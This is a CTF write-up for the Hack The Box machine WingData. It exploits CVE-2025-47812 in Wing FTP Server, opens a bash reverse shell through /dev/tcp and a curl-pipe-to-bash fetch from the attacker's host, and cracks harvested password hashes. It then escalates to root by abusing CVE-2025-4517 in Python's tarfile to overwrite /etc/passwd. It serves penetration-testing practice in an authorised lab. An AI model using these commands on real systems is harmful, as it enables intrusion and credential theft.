> m4rt@CTF_ARCHIVE:~$

// ATTACHMENTS

Hack The Box / LINUX / 2026-06-27

Hack The Box — WingData (Linux)

CVE-2025-47812 in Wing FTP Server v7.4.3 allows to get a reverse shell as wingftp. Some user data are contained in XML files and we can crack the password of user wacky and login via SSH. User wacky can run a Python script with sudo privileges. The script uses the tar package and `tar.extractall()`. CVE-2025-4517 allows to modify existing files, so we can modify /etc/passwd to add a root user.

Target

  • IP: 10.129.11.92

Port scan

sudo nmap -sC -sV 10.129.11.92 -p- -v
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u7 (protocol 2.0)
| ssh-hostkey:
|   256 a1:fa:95:8b:d7:56:03:85:e4:45:c9:c7:1e:ba:28:3b (ECDSA)
|_  256 9c:ba:21:1a:97:2f:3a:64:73:c1:4c:1d:ce:65:7a:2f (ED25519)
80/tcp open  http    Apache httpd 2.4.66
|_http-title: Did not follow redirect to http://wingdata.htb/
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.66 (Debian)
Service Info: Host: localhost; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Add wingdata.htb to /etc/hosts.

Initial enumeration

Go to http://wingdata.htb/.

There is a button labeled client portal.

It redirects to http://ftp.wingdata.htb/

Add ftp.wingdata.htb to /etc/hosts

Go to http://ftp.wingdata.htb/

It is Wing FTP Server v7.4.3.

CVE-2025-47812 - Wing FTP Server

There is a vulnerability: CVE-2025-47812.

Here is a PoC: https://www.exploit-db.com/exploits/52347

Download the PoC

python3 CVE-2025-47812.py -u http://ftp.wingdata.htb
[*] Testing target: http://ftp.wingdata.htb
[+] http://ftp.wingdata.htb is vulnerable!
python3 CVE-2025-47812.py -u http://ftp.wingdata.htb -c whoami
wingftp

Create a rev file with the following content:

bash -i >& /dev/tcp/10.10.17.53/4444 0>&1

Start the listeners:

python3 -m http.server 5555
nc -vlnp 4444

Trigger the reverse shell:

python3 CVE-2025-47812.py -u http://ftp.wingdata.htb -c 'curl http://10.10.17.53:5555/rev|bash'

We obtain a reverse shell.

Let's check the users of the machine:

ls -la /home
total 12
drwxr-xr-x  3 root  root  4096 Nov  3 12:04 .
drwxr-xr-x 18 root  root  4096 Feb  9 08:19 ..
drwxrwx---  2 wacky wacky 4096 Jan 22 04:41 wacky

Harvesting credentials

grep -nriE 'wacky' .
./Data/1/users/wacky.xml:4:        <UserName>wacky</UserName>
./Log/Admin/Admin-2025-11-2.log:15:[01] Sun, 02 Nov 2025 12:04:49 administrator 'admin' added a user 'wacky'. [1]
grep: ./Log/audit_db: binary file matches

In /opt/wftpserver/Data/1/users there are XML files containing user data. In wacky.xml we notice:

<Password>32940defd3c3ef70a2dd44a5301ff984c4742f0baae76ff5b8783994f8a503ca</Password>
grep -nriE 'UserName|<Password>' .
./maria.xml:4:        <UserName>maria</UserName>
./maria.xml:7:        <Password>a70221f33a51dca76dfd46c17ab17116a97823caf40aeecfbc611cae47421b03</Password>
./steve.xml:4:        <UserName>steve</UserName>
./steve.xml:7:        <Password>5916c7481fa2f20bd86f4bdb900f0342359ec19a77b7e3ae118f3b5d0d3334ca</Password>
./wacky.xml:4:        <UserName>wacky</UserName>
./wacky.xml:7:        <Password>32940defd3c3ef70a2dd44a5301ff984c4742f0baae76ff5b8783994f8a503ca</Password>
./anonymous.xml:4:        <UserName>anonymous</UserName>
./anonymous.xml:7:        <Password>d67f86152e5c4df1b0ac4a18d3ca4a89c1b12e6b748ed71d01aeb92341927bca</Password>
./john.xml:4:        <UserName>john</UserName>
./john.xml:7:        <Password>c1f14672feec3bba27231048271fcdcddeb9d75ef79f6889139aa78c9d398f10</Password>

In /opt/wftpserver/Data/1/settings.xml we also notice:

./settings.xml:172:    <SaltingString>WingFTP</SaltingString>

Add:

maria:a70221f33a51dca76dfd46c17ab17116a97823caf40aeecfbc611cae47421b03:WingFTP
steve:5916c7481fa2f20bd86f4bdb900f0342359ec19a77b7e3ae118f3b5d0d3334ca:WingFTP
wacky:32940defd3c3ef70a2dd44a5301ff984c4742f0baae76ff5b8783994f8a503ca:WingFTP
anonymous:d67f86152e5c4df1b0ac4a18d3ca4a89c1b12e6b748ed71d01aeb92341927bca:WingFTP
john:c1f14672feec3bba27231048271fcdcddeb9d75ef79f6889139aa78c9d398f10:WingFTP

In a hash file:

Cracking with hashcat and SSH access

./hashcat/hashcat -a 0 -m 1410 ./hash ./rockyou.txt --username
./hashcat/hashcat -a 0 -m 1410 ./hash ./rockyou.txt --username --show
wacky:32940defd3c3ef70a2dd44a5301ff984c4742f0baae76ff5b8783994f8a503ca:WingFTP:!#7Blushing^*Bride5
anonymous:d67f86152e5c4df1b0ac4a18d3ca4a89c1b12e6b748ed71d01aeb92341927bca:WingFTP:
ssh wacky@wingdata.htb
# Enter password !#7Blushing^*Bride5

Sudo permissions

sudo -l
Matching Defaults entries for wacky on wingdata:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User wacky may run the following commands on wingdata:
    (root) NOPASSWD: /usr/local/bin/python3 /opt/backup_clients/restore_backup_clients.py *
sudo /usr/local/bin/python3 /opt/backup_clients/restore_backup_clients.py --help
usage: restore_backup_clients.py [-h] -b BACKUP -r RESTORE_DIR

Restore client configuration from a validated backup tarball.

options:
  -h, --help            show this help message and exit
  -b BACKUP, --backup BACKUP
                        Backup filename (must be in /home/wacky/backup_clients/ and match backup_<client_id>.tar,
                        where <client_id> is a positive integer, e.g., backup_1001.tar)
  -r RESTORE_DIR, --restore-dir RESTORE_DIR
                        Staging directory name for the restore operation. Must follow the format:
                        restore_<client_user> (e.g., restore_john). Only alphanumeric characters and underscores
                        are allowed in the <client_user> part (1–24 characters).

Example: sudo restore_backup_clients.py -b backup_1001.tar -r restore_john

The script takes a .tar backup and extracts it into a restore directory.

It validates both backup and restore-dir arguments, preventing simple attacks.

For backup and restore directories it uses:

BACKUP_BASE_DIR = "/opt/backup_clients/backups"
STAGING_BASE = "/opt/backup_clients/restored_backups"

We can write in the backup folder, but not in the restore folder. The script uses the tar package and tar.extractall():

with tarfile.open(backup_path, "r") as tar:
            tar.extractall(path=staging_dir, filter="data")

The data filter mitigates many path traversal, symlink, and unsafe file issues.

Checking Python version:

python3 --version
Python 3.12.3

Searching online we find a vulnerability in Python tar package: CVE-2025-4517.

CVE-2025-4517 - Python tar package

PoC: https://github.com/google/security-research/security/advisories/GHSA-hgqp-3mmf-7h8f

Using the PoC we can modify existing files. Since we run the script with sudo, we have root privileges. The idea is to modify /etc/passwd to add a root user.

cd /opt/backup_clients/backups/

We copy /etc/passwd locally:

cp /etc/passwd .

We add a user r00t with password Password123:

pw=$(openssl passwd Password123); echo "r00t:${pw}:0:0:root:/root:/bin/bash" >> passwd

We modify the PoC script CVE-2025-4517.py to overwrite the original passwd file with ours. See the attached script CVE-2025-4517.py.

Copy it in /opt/backup_clients/backups/

Run it:

python3 CVE-2025-4517.py

We get poc.tar

Rename it:

mv poc.tar backup_1.tar

Run the vulnerable script:

sudo /usr/local/bin/python3 /opt/backup_clients/restore_backup_clients.py -b backup_1.tar -r restore_test
[+] Backup: backup_1.tar
[+] Staging directory: /opt/backup_clients/restored_backups/restore_test
[+] Extraction completed in /opt/backup_clients/restored_backups/restore_test

Check:

cat /etc/passwd

We see:

r00t:$1$o7C749dd$CefPQKA.696u48JenDJWa1:0:0:root:/root:/bin/bash

Login as root:

su r00t
# Enter password Password123

We obtain a root shell